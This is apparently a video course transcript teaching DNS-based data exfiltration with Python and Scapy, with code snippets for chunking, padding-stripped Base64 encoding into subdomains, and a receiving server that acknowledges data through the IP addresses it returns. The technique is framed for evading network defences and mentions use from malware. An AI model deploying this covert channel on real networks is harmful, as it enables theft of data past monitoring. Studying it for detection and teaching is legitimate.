Hello and welcome to this course in which we're talking about using Python for data exfiltration. In this video, we're going to be talking about using an alternative protocol for data exfiltration, namely data exfiltration via DNS. You're probably aware that DNS is one of the most widely used protocols on the Internet. Its purpose is to translate domain names like google.com into IP addresses. DNS is organized as a hierarchy, meaning that you've got DNS name servers for top-level domains like .com, .net, etc. Those provide information on how to find domains lower down the hierarchy, like google.com. Then, from google.com's name servers, you can find addresses for hosts like mail.google.com or www.google.com. All of this is relevant to this particular video because DNS makes a very good option for data exfiltration. DNS traffic is rarely blocked at organizations' network boundaries, because it's very common for computers to make DNS requests and receive DNS responses. If they couldn't do that, you couldn't visit any website whose IP address you don't already know. DNS is also useful because organizations are very accustomed to seeing requests go out to arbitrary name servers: the name server that gives you information on, say, infosecinstitute.com is probably owned by the InfoSec Institute, not by your own organization. What this means is that an attacker could set up a DNS server for a domain under their control and then ensure that any traffic intended for that domain involves a DNS request to their own server. That's what we're going to be taking advantage of in this video, by embedding command-and-control data or exfiltrated data within DNS requests. Let's start by looking at the bottom of our client program. This is the equivalent of our main function. We've got two pieces of data that we're going to be sending using the send data function here. The first is actually something that you might want to exfiltrate.
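To make the hierarchy concrete, here is a small sketch that lists the zones a resolver conceptually walks through for a name, from the top-level domain down to the full host name. The `ancestry` helper is hypothetical and ignores the root zone for simplicity.

```python
def ancestry(name: str) -> list[str]:
    """Return the zones from the TLD down to the full name (root zone omitted)."""
    labels = name.rstrip(".").split(".")
    # Build suffixes from the right-most label leftwards
    return [".".join(labels[i:]) for i in range(len(labels) - 1, -1, -1)]

print(ancestry("mail.google.com"))  # ['com', 'google.com', 'mail.google.com']
```

Each entry corresponds to a level where a different set of name servers is authoritative, which is why a request for a subdomain of a domain you control eventually reaches your own server.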
In this case, it's just the phrase "this is secret data." The other one is the letter R. We've set up the client and the server so that when the server receives a chunk of data containing only the letter R, the current transmission is complete. If you're using DNS to exfiltrate files, you'd send a file, send the letter R, then send the next file. Obviously this is just a choice, and you can configure the boundaries between packets, etc., however you wish when you're doing data exfiltration, even with this particular tool. At the bottom of our client code, we see that we're calling a send data function that's actually going to do the data exfiltration. That function is defined here in lines 26-33 of the client code, and what it does is break the data that we're exfiltrating into multiple chunks. Each chunk is going to be 10 characters long, and the reason for this is that we're going to be encoding the data that we're trying to exfiltrate as a subdomain in a DNS request. We see up here towards the top of our screen that the base domain we'll be using is google.com, so if we wanted to send the message "mail" unencoded or unencrypted, we'd make a request for mail.google.com. If you've ever looked at domain names and DNS requests before, you know that the subdomains at the beginning are relatively short. If we're trying to exfiltrate an entire file via DNS, we need to break it up into chunks. A DNS request for 10 kilobytes or so of data followed by .google.com would look suspicious, and it wouldn't even fit: DNS limits each label to 63 bytes and a whole name to 255 bytes. What we're going to do is break our data into chunks of length 10 and then encode those chunks using Base64. If you're not familiar, Base64 is an encoding algorithm, not an encryption algorithm. The important distinction there is that there's no secret key involved in Base64 encoding, so anyone can reverse a Base64 encoding.
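The chunking scheme described above can be sketched in plain Python. This is an illustration, not the course's client code: `chunks`, `transmission`, and the constant names are hypothetical, while the chunk size of 10, the "R" end marker, and the 63-byte label limit come from the discussion above and RFC 1035.

```python
import base64

CHUNK_SIZE = 10     # characters per chunk, as in the course's client
END_MARKER = "R"    # a chunk containing only "R" tells the server the message is complete
MAX_LABEL = 63      # RFC 1035: a single DNS label holds at most 63 bytes

def chunks(data: str, size: int = CHUNK_SIZE) -> list[str]:
    """Split data into consecutive pieces of at most `size` characters."""
    return [data[i:i + size] for i in range(0, len(data), size)]

def transmission(data: str) -> list[str]:
    """All chunks for one message, followed by the end-of-transmission marker."""
    return chunks(data) + [END_MARKER]

for piece in transmission("this is secret data"):
    encoded_len = len(base64.b64encode(piece.encode("utf-8")))
    # 10 ASCII characters become 16 Base64 characters, comfortably under the limit
    assert encoded_len <= MAX_LABEL
    print(repr(piece), encoded_len)
```

Because Base64 grows data by roughly a third, a 10-character ASCII chunk stays short; chunks of non-ASCII text would encode to more bytes and need a smaller size.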
It just adds a level of obfuscation by making it a little bit harder to identify the encoded data. However, if you can recognize the data as Base64 and decode it, you get the original data back. We're mainly using this to add a level of obfuscation to our data exfiltration. One other thing that we're doing is using rstrip to remove the equal signs from the end of the encoded data. The reason for this is that Base64-encoded data is very recognizable. You've got a limited character set, 64 characters, and most Base64-encoded data has an equal sign or two at the end. The reason why is that Base64 encodes its input in groups of 3 bytes, producing 4 characters per group, so any input whose length isn't an exact multiple of 3 bytes ends up with one or two equal signs of padding. We're going to remove this padding when we make the DNS requests, just to make it a little bit harder to tell that we're sending Base64-encoded data over the wire. Once we've encoded the data, we call our DNS request function to actually send a DNS request for that encoded data, and that's defined up here in this function. As we mentioned, the DNS request performs data exfiltration by using a subdomain to hold the exfiltrated data. For example, we might have something like <encoded data>.google.com; we make a request for that subdomain, and the server sends a response containing the IP address associated with that particular subdomain, if it existed. First, we need to build the domain we're requesting: the encoded data becomes the subdomain, and we append our defined domain to it, in this case, google.com. We're able to use google.com here because we're controlling which server the request is sent to: we're sending it directly to a server under our control. Otherwise, you'd want to use a domain that you control and then set up a DNS server that any requests regarding that domain will be sent to.
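A minimal sketch of the client-side encoding step, assuming the chunk is text and the base domain is google.com as in the demo. The names `encode_chunk` and `build_qname` are hypothetical; `base64.b64encode` and `str.rstrip` are the standard-library calls the description refers to.

```python
import base64

BASE_DOMAIN = "google.com"  # base domain used in the course demo

def encode_chunk(chunk: str) -> str:
    """Base64-encode a chunk and drop the trailing '=' padding."""
    return base64.b64encode(chunk.encode("utf-8")).decode("ascii").rstrip("=")

def build_qname(chunk: str, base: str = BASE_DOMAIN) -> str:
    """Place the encoded chunk as the left-most label of the queried name."""
    return f"{encode_chunk(chunk)}.{base}"

print(build_qname("this is se"))
print(build_qname("R"))  # Ug.google.com
```

Note that the standard Base64 alphabet can produce "+" and "/", which aren't valid in ordinary hostnames. The demo gets away with this because its server reads the raw query; `base64.urlsafe_b64encode` would be one possible variation if that mattered.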
But since we're specifying the IP address to send to, it's not really a problem right now. With the domain we've defined, we build a DNS query structure using Scapy, which allows us to build and send custom packets over the network. We're also going to get the hardware (MAC) address of the network interface we'll be using. This is only because we're going to be running this code on the localhost. The reason is that when you're using the localhost with Scapy, Scapy can be a little bit inconsistent about which interfaces it uses. It wouldn't be uncommon for us to make a request over the wireless NIC (WNIC) and then have the response sent over the loopback. This becomes problematic with a request-response structure, because the requester, or the client, doesn't realize that the packet coming back is intended for it. We're going to use explicit MAC addresses and build the Ethernet layer of our packet ourselves, just to solve that problem and lock ourselves into a particular network interface card. However, you could eliminate this layer if you're sending things over the network to a remote host, where the interfaces used will be consistent. As I mentioned, we start by building a packet with the Ethernet layer, specifying the source and destination MAC addresses. They're the same, because they're both the MAC address of the network interface card we want to use. Encapsulated within that Ethernet frame, we put an IP packet. By default, it's an IPv4 packet, and the only thing that we need to define at this level is the IP address that we want to send the packet to. We're specifying a variable, IP, that's defined globally. In this case, it's the IP address of the local machine we're using in this demo, 10.10.10.8. If you're running this code on your own, make sure to substitute in your own IP address here, or else this isn't going to work.
Beyond the destination IP address, Scapy will handle filling out the rest of the fields of our IP layer. Above the IP layer, we build a UDP packet. This is a choice, since DNS can be implemented over UDP or TCP. However, UDP is often used because it's a more lightweight protocol, and DNS doesn't really require all of the guarantees that TCP provides. In our particular case, a UDP request-response exchange, or call and response, whatever you want to call it, is a lot easier to implement than performing a full TCP handshake to set up the connection, sending the data, and then tearing it down at the end. It's much easier to send a single request and a single response. At the UDP layer, again, we only need to define one thing: the destination port of the packet, which is where our server code will be listening on the computer. Then, above the UDP layer, we finally define a DNS layer. Here the only thing that we really need to define is the query that we built up here, and the only thing we defined in that query is the domain we're requesting. Again, as we build and send the packet, Scapy is going to handle all of the other fields, filling them with at least plausible, if not realistic, values. Once we've built our packet, we can use Scapy's srp1 function to send it. The choice of srp1 here comes from two factors. We want something ending in a 1 because we want to send a packet and receive a single reply. Scapy has a couple of different options for doing that: one is sr1 and one is srp1. We're choosing srp1 in this case because we want to send this packet at layer 2, since we've defined our own Ethernet layer because we're using the localhost. If we deleted the Ethernet layer of our packet, we could use sr1 and have Scapy handle the Ethernet layer for us. We're calling srp1, providing the packet to send, and we're also passing verbose=False.
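Scapy fills in most of the DNS layer for us. For illustration only, here is a standard-library sketch of roughly what a minimal DNS query message contains on the wire, following the RFC 1035 format: a 12-byte header, then the queried name as length-prefixed labels, then the query type and class. This is not how the course's client builds packets (that uses Scapy), and `encode_qname` and `build_query` are hypothetical helpers.

```python
import struct

def encode_qname(name: str) -> bytes:
    """Encode a domain name as length-prefixed labels ending in a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) <= 63:  # RFC 1035 label length limit
            raise ValueError(f"invalid label length: {label!r}")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"

def build_query(query_id: int, name: str) -> bytes:
    """A minimal DNS query: 12-byte header plus one A/IN question."""
    flags = 0x0100  # only the RD (recursion desired) bit is set
    # ID, flags, QDCOUNT=1, ANCOUNT=0, NSCOUNT=0, ARCOUNT=0
    header = struct.pack("!HHHHHH", query_id, flags, 1, 0, 0, 0)
    question = encode_qname(name) + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN
    return header + question

msg = build_query(0x1234, "Ug.google.com")
print(msg.hex())
```

The exfiltrated chunk simply rides along as the first label of the question; everything else is an ordinary-looking A-record lookup.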
The reason for this is that Scapy can be rather talkative as it sends a packet and waits for a response. Setting verbose to False just means that we won't get all of that additional information on the command line. Once we've sent our packet and received the reply, we call a process function to deal with the result. We're not going to dive into that process function quite yet, because it's based on the data that we receive in our response, so it only makes sense to talk about how the server structures that response before we dive into interpreting it. On the server side, again, we're going to be using Scapy. In this case, we're going to be defining a socket, but we're not actually going to be using it. The reason we're defining a socket here is that if there's nothing listening on the port that we're sending traffic to, there's a good chance that we'll get an ICMP port unreachable or some other error, because we're trying to access a port that doesn't have anything listening. So we're having the Python code bind that port so that it's open, but notice that listen is commented out: we're not actually going to be using the socket and listen functions to look at the traffic. Instead, we're going to be using sniff. Sniff is a function built into Scapy, and it allows us to monitor the traffic coming over the network. We could use filters here, but we're just going to use an if statement later on. What we're doing here with prn is saying that for every packet, call our extract data function and pass it the packet for processing. Our extract data function is defined here. The goal of this function is to read in and interpret the information being sent via our DNS exfiltration and then take action accordingly. We test whether the packet has a DNS layer, and we also test whether the destination port of the UDP traffic is port 1337, where we're supposed to be listening. If so, there's a good chance that this packet was intended for us.
As we mentioned when we were talking about the client, we're going to be using subdomains for our data exfiltration from client to server. The way we access the subdomain data here is x[DNS].qd.qname, where qname stands for question name. We saw this over here when we were defining the query, qname=d, so we're extracting that same value on the other side. Next, we need to eliminate the part of the domain name that we don't actually care about. Our domain is structured as a Base64-encoded chunk of data, followed by a period, followed by the rest of the domain name. By using the index method here, we can find the first occurrence of something in our domain string. In this case, we're looking for a period. That will be the period that separates our Base64-encoded string from the rest of the domain name. With the resulting index, we can truncate our domain name to just our Base64-encoded data. So now we have something that's Base64-encoded, but it's not necessarily Base64-decodable at this point. Remember, when we were talking about the client, we said that we would be stripping the trailing equal signs from our data. This is problematic because we can't decode the data without those equal signs. However, we know how padding works with Base64, so we can put those equal signs back in. This calculation here tells us how many padding equal signs we need at the end of our data: we take the length of the data mod 4, subtract that from 4, and take the result mod 4 again, so that data whose length is already a multiple of 4 gets no padding. Once we've got that number, we can create a string of equal signs using the equal sign times pad num. Say pad num is two: we get two equal signs, convert them to bytes, and append them to the end of the data. Now we have a properly padded Base64-encoded chunk of data.
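A sketch of the server-side extraction and padding restoration described above. It assumes, as with Scapy's qname field, that the queried name arrives as bytes with a trailing period; `decode_qname` is a hypothetical name, not the course's function.

```python
import base64

def decode_qname(qname: bytes) -> str:
    """Recover the plaintext chunk from a queried name such as b'Ug.google.com.'."""
    label = qname[: qname.index(b".")]   # everything before the first period
    pad_num = (4 - len(label) % 4) % 4   # 0, 2 or 1 '=' for lengths 0, 2, 3 mod 4
    padded = label + b"=" * pad_num      # restore the padding the client stripped
    return base64.b64decode(padded).decode("utf-8")

print(decode_qname(b"Ug.google.com."))   # R
```

The outer `% 4` is what keeps a label whose length is already a multiple of 4 from receiving four spurious equal signs.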
With that in hand, we can call b64decode to decode the data, and then call decode with UTF-8 to convert from bytes to a string. Now, in theory, we should have either a chunk of the phrase "this is secret data" or the marker saying that we're done with transmission. If decoded equals R, meaning the transmission is done, we send a response based on the received packet x, giving 10.0.0.2 as the IP address associated with the requested domain. We then print a message saying the transmission has ended, and print extracted, which holds all of the data that we've read from our data exfiltration. Then we reset extracted to an empty string so that we can build it up again. If this isn't the end of transmission, we take our decoded data, append it to extracted, and then send a response, passing in packet x and the IP address 10.0.0.1. Finally, things can go wrong here, so we also have some error handling code. If we hit an exception, we print the exception and send a response with x and 10.0.0.0. Notice that the three IP addresses I've mentioned are all different, and that's because our server-side responses to the client's requests encode the data they're sending back in the IP addresses. In the last octet, a 0 means we've got an error, a 1 means the server has acknowledged a chunk of data, and a 2 means it has acknowledged that the end of this set of data chunks has been received. We send that in response to the R over here. The send response function that we reference here is defined up here towards the top of the code. We start with a query, which is the entire packet that was sent as our request. Our question is in the DNS layer of the query, query[DNS].qd. That's what we defined over in our client when we wrote DNSQR(qname=d). Exact same thing.
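The server's decision logic can be sketched independently of Scapy as a small state machine that takes an encoded label and returns the IP address to answer with. The `Receiver` class and the constant names are hypothetical; the three addresses and the "R" marker come from the description above. In the course's server, the returned address would be handed to the send response function.

```python
import base64

STATUS_ERROR = "10.0.0.0"     # something went wrong
STATUS_CHUNK_OK = "10.0.0.1"  # chunk received and appended
STATUS_END = "10.0.0.2"       # end-of-transmission marker received

class Receiver:
    """Hypothetical stand-alone version of the server's bookkeeping."""

    def __init__(self) -> None:
        self.extracted = ""             # data for the current transmission
        self.messages: list[str] = []   # completed transmissions

    def handle(self, label: bytes) -> str:
        """Process one encoded label and return the IP address to answer with."""
        try:
            padded = label + b"=" * ((4 - len(label) % 4) % 4)
            decoded = base64.b64decode(padded).decode("utf-8")
        except ValueError as exc:  # bad Base64 (binascii.Error) or invalid UTF-8
            print(exc)
            return STATUS_ERROR
        if decoded == "R":
            print("End transmission:", self.extracted)
            self.messages.append(self.extracted)
            self.extracted = ""         # reset for the next transmission
            return STATUS_END
        self.extracted += decoded
        return STATUS_CHUNK_OK
```

Catching `ValueError` covers both decoding failures, since `binascii.Error` and `UnicodeDecodeError` are subclasses of it.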
When we're defining our response, both the answer record and the DNS layer need to be based on this information. For example, when we call DNSRR, this is going to be our answer. We want rrname to equal question.qname. This is essentially saying that we are providing a response for the same domain name the client requested from us. We also want to set a time to live, and then our rdata is the actual answer to the question "what is the IP address?" That's going to be the IP address that we pass in, so 10.0.0.something. With this answer in hand, we can start to actually build our response packet. We're going to build this response packet the same way that we built the request packet, from the very bottom up. We start with an Ethernet layer, and we say that both the source and destination MAC addresses are the same as the ones from the query. Again, this is only to support localhost transmissions, because of Scapy's oddness with interfaces. You don't need this if you're transmitting to a remote host. Once we've defined the Ethernet layer, we need to define the IP layer, which is a little bit more complicated here, because we need to define both the source and the destination IP address. It's important to note that they have to be switched from the request. Whatever address is the source in the request needs to be the destination of the response, because that's the IP address of the client in this case. Same thing with the source: switch them around. At the UDP layer, same thing: we take the query, or request, look at its UDP layer, get its source port, and set that as this packet's destination port, and then we can set the source port here to 1337, because we know that's where we're listening. Finally, once we reach the DNS layer, we have to define a few different fields. We need to set the ID to match that of the query so that the client knows this is a response to its request.
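The address and port swap described above can be shown in isolation. This sketch uses a hypothetical `Endpoints` dataclass in place of Scapy's IP and UDP layers; 1337 is the listening port from the demo, and the addresses and client port in any usage are made up.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Endpoints:
    """Addressing fields taken from a packet (hypothetical helper type)."""
    src_ip: str
    dst_ip: str
    sport: int
    dport: int

def reply_endpoints(request: Endpoints, listen_port: int = 1337) -> Endpoints:
    """Swap source and destination so the response goes back to the client."""
    return Endpoints(
        src_ip=request.dst_ip,   # the server answers from the address it was asked on
        dst_ip=request.src_ip,   # and sends to the client's address
        sport=listen_port,       # the server's own listening port
        dport=request.sport,     # the client's source port from the request
    )
```

Getting the destination port right matters most: the client only recognizes the reply if it comes back to the port its request was sent from.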
We then set qr=1 to mark this packet as a response, and qdcount=1 and ancount=1: the number of questions is one and the number of answers is one. Then we specify our question, qd, which is query[DNS].qd, and an, which is our answer here. Then we have a sleep command here. Again, this is because we're working on localhost. It turns out that if you implement this on localhost in this way, you might occasionally get the response sent before the request, apparently because the response is built more quickly and makes it to the wire faster. Sending the response before the request is obviously going to make it hard for the client to realize that this is the response to its request, so we put a slight sleep in there just to keep things ordered properly. Then finally, we use sendp with the response. Again, the p specifies that we're working at layer 2 instead of layer 3, and we wouldn't need that if we were sending traffic to, for example, a remote host. Now let's open up a couple of terminal windows and see how this works. We've got one here, move to the appropriate folder, and then we open up a second terminal window to run the client code as well. In this one, we're going to run DNSExfiltrationServer.py. We've got to have that running before our client starts, so we hit Enter, and it's now waiting for traffic to be sent to it. We then run our client code, DNSExfiltration.py, in the other window. If we hit Enter now, we see that we're transmitting "this is se", our first chunk, and there's the encoded version of it. Then we get a response from the server saying that it was received successfully. If we look at our client code, we see that "received successfully" means we received a response of 10.0.0.1 from the server, so that's all good. We send the rest of the data, again along with its Base64-encoded version.
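What those DNS-layer settings mean at the byte level can be sketched with `struct`: the response header copies the query's ID, sets the QR bit, and reports one question and one answer. This is a hypothetical stand-alone helper, not the course's Scapy code; echoing the RD bit follows RFC 1035, and a real server would usually set further flags too.

```python
import struct

QR_BIT = 0x8000  # set in the flags word of every DNS response
RD_BIT = 0x0100  # recursion desired, copied from the query

def response_header(query: bytes, ancount: int = 1) -> bytes:
    """Build a 12-byte DNS header answering the header at the start of `query`."""
    query_id, query_flags, qdcount, _, _, _ = struct.unpack("!HHHHHH", query[:12])
    flags = QR_BIT | (query_flags & RD_BIT)  # mark as response, echo RD
    # Same ID and question count as the query, plus our answer count
    return struct.pack("!HHHHHH", query_id, flags, qdcount, ancount, 0, 0)
```

The matching ID is what lets the client pair this reply with its outstanding request.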
It was received successfully, again with a response of 10.0.0.1. Then we transmit that R for transmission complete. We're sending just Ug, the Base64 encoding of R with its padding stripped, and we get "acknowledged end transmission," which means that we got back the IP address 10.0.0.2. We have a successful DNS exfiltration from the client to the server. In fact, the server is still running, as we see. We could transmit additional data to the server from the malware in another session. We can do that just by running the code again, and it goes through the same series: send over the data, acknowledged end transmission. At the end, we'd see the end-of-transmission message on the server. Everything gets read off the wire, and then again down here. The goal of this demonstration was to show how to use an alternative protocol for data exfiltration. In this case, we're encapsulating our data exfiltration traffic within DNS requests and then getting feedback from the server via DNS responses. We could certainly make this code more sophisticated, add additional functionality, and give the server the ability to send more granular responses as well. We're only using the last octet of the IP address, and only three values of it; without even going beyond that last octet, we could have 256 possible responses from the server. This is only one way to encapsulate data exfiltration traffic within an alternative protocol. Thank you.
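On the client side, interpreting a reply comes down to reading the last octet of the answered address. Here is a sketch using the standard `ipaddress` module. The helper names are hypothetical, and so is the "error" message text; the other two messages mirror the client output in the demo. The round trip over all 256 values illustrates the point about a single octet.

```python
import ipaddress

STATUS_MESSAGES = {
    0: "error",                          # hypothetical wording
    1: "received successfully",
    2: "acknowledged end transmission",
}

def status_from_answer(answer: str) -> int:
    """Return the last octet of the answered IPv4 address."""
    return ipaddress.IPv4Address(answer).packed[-1]

def answer_for_status(code: int, prefix: str = "10.0.0.") -> str:
    """Encode a status code in the last octet of the answer."""
    if not 0 <= code <= 255:
        raise ValueError("one octet holds values 0-255")
    return f"{prefix}{code}"

print(STATUS_MESSAGES[status_from_answer("10.0.0.2")])  # acknowledged end transmission
```

Using the remaining three octets as well would allow far richer responses, at the cost of answers that look less like ordinary private addresses.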